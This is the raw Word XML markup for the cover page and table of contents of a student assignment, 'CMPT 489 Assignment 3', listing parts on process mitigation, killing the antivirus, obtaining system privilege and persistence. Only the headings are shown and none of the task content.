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98948" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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28"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E2157" w:rsidRPr="001B3105" w14:paraId="32348191" w14:textId="77777777" w:rsidTr="00512C83">
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:alias w:val="Company"/>
            <w:id w:val="13406915"/>
            <w:placeholder>
              <w:docPart w:val="89270111DFB44E048CD758282BE6DDE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4747189" w14:textId="1A697152" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="00E9040A" w:rsidP="00512C83">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:autoSpaceDE w:val="0"/>
                  <w:autoSpaceDN w:val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CMPT 489</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:sdtContent>
        </w:sdt>
      </w:tr>
      <w:tr w:rsidR="008E2157" w:rsidRPr="001B3105" w14:paraId="04A337B3" w14:textId="77777777" w:rsidTr="00512C83">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7672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  <w:hideMark/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="88"/>
                <w:szCs w:val="88"/>
              </w:rPr>
              <w:alias w:val="Title"/>
              <w:id w:val="13406919"/>
              <w:placeholder>
                <w:docPart w:val="FFA66547B84849DCA4567404553392F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235B67A0" w14:textId="4C5AFB2F" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="00E9040A" w:rsidP="00512C83">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:autoSpaceDE w:val="0"/>
                  <w:autoSpaceDN w:val="0"/>
                  <w:spacing w:line="216" w:lineRule="auto"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                    <w:sz w:val="88"/>
                    <w:szCs w:val="88"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
                    <w:sz w:val="88"/>
                    <w:szCs w:val="88"/>
                  </w:rPr>
                  <w:t>Assignment 3</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E2157" w:rsidRPr="001B3105" w14:paraId="0418386B" w14:textId="77777777" w:rsidTr="00512C83">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7672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49C87F3" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="008E2157" w:rsidP="00512C83">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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8331"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E2157" w:rsidRPr="001B3105" w14:paraId="2A630F63" w14:textId="77777777" w:rsidTr="00512C83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Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:alias w:val="Author"/>
              <w:id w:val="13406928"/>
              <w:placeholder>
                <w:docPart w:val="D319910E9E0140C8BAFD8C4778E9D6EC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30390AC2" w14:textId="3BD0EA82" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="00E9040A" w:rsidP="00512C83">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:autoSpaceDE w:val="0"/>
                  <w:autoSpaceDN w:val="0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sz w:val="28"/>
                    <w:szCs w:val="28"/>
                  </w:rPr>
                  <w:t xml:space="preserve">Marcelo </w:t>
                </w:r>
                <w:proofErr w:type="spellStart"/>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                    <w:sz w:val="28"/>
                    <w:szCs w:val="28"/>
                  </w:rPr>
                  <w:t>Ollin</w:t>
                </w:r>
                <w:proofErr w:type="spellEnd"/>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                    <w:sz w:val="28"/>
                    <w:szCs w:val="28"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> Paco Zepeda</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:alias w:val="Date"/>
              <w:tag w:val="Date"/>
              <w:id w:val="13406932"/>
              <w:placeholder>
                <w:docPart w:val="83B96B42C8C34A17AC54477CFD5720CE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-d-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75E7C8F" w14:textId="0112F174" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="00E9040A" w:rsidP="00512C83">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:autoSpaceDE w:val="0"/>
                  <w:autoSpaceDN w:val="0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sz w:val="28"/>
                    <w:szCs w:val="28"/>
                  </w:rPr>
                  <w:t>301180252</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
          <w:p w14:paraId="1EDD49C0" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="008E2157" w:rsidP="00512C83">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35520B21" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2781B360" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="001B3105" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B3105">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Georgia" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:id w:val="-1884784873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35CB412B" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="00834D24" w:rsidRDefault="008E2157" w:rsidP="008E2157">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:i/>
              <w:iCs/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00834D24">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
              <w:i/>
              <w:iCs/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0F85989D" w14:textId="206F0E27" w:rsidR="00540C98" w:rsidRDefault="008E215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r w:rsidRPr="00834D24">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00834D24">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-4" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00834D24">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc21101959" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 1: Process Mitigation</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101959 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00362087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="133C700B" w14:textId="3704323D" w:rsidR="00540C98" w:rsidRDefault="00362087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0" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 1:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101960 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10A30188" w14:textId="4F523567" w:rsidR="00540C98" w:rsidRDefault="00362087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1" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 2:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101961 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="587E8656" w14:textId="2D6C5A4B" w:rsidR="00540C98" w:rsidRDefault="00362087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2" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Task 3:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101962 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08F47979" w14:textId="52779CEB" w:rsidR="00540C98" w:rsidRDefault="0036208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01963" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 2 Killing the Antivirus:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101963 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C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0C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25E4BD79" w14:textId="0EF8BFDF" w:rsidR="00540C98" w:rsidRDefault="00362087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4" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 4:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101964 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53458C5E" w14:textId="3C2F385D" w:rsidR="00540C98" w:rsidRDefault="00362087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5" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Task 5:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101965 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E26E1F1" w14:textId="54B336B1" w:rsidR="00540C98" w:rsidRDefault="0036208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01966" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 3: Obtaining System Privilege</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101966 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C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0C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24B6B4B1" w14:textId="69EE7FDA" w:rsidR="00540C98" w:rsidRDefault="00362087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7" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 6:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101967 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="103EB17C" w14:textId="40A18D2E" w:rsidR="00540C98" w:rsidRDefault="00362087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8" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 7:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101968 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="502BAAF4" w14:textId="144AC6BA" w:rsidR="00540C98" w:rsidRDefault="00362087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9" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Task 8:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101969 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="364A225E" w14:textId="5F08126C" w:rsidR="00540C98" w:rsidRDefault="0036208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01970" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Part 4: Persistence</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101970 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C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0C98">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55152DD0" w14:textId="460D8081" w:rsidR="00540C98" w:rsidRDefault="00362087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71" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 9:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101971 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="288B7136" w14:textId="33AC4DBD" w:rsidR="00540C98" w:rsidRDefault="00362087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72" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Task 10:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101972 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0882E6A2" w14:textId="4CF5913F" w:rsidR="00540C98" w:rsidRDefault="00362087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73" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Task 11:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101973 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20D6894E" w14:textId="26FD048F" w:rsidR="00540C98" w:rsidRDefault="00362087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74" w:history="1">
            <w:r w:rsidR="00540C98" w:rsidRPr="00F80E15">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 12:</w:t>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc21101974 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00540C98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540C98">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="235E19CE" w14:textId="2ED72A7C" w:rsidR="008E2157" w:rsidRPr="00834D24" w:rsidRDefault="008E2157" w:rsidP="008E2157">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00834D24">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6C10BB51" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="00834D24" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EEF734" w14:textId="77777777" w:rsidR="008E2157" w:rsidRPr="00834D24" w:rsidRDefault="008E2157" w:rsidP="008E2157">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
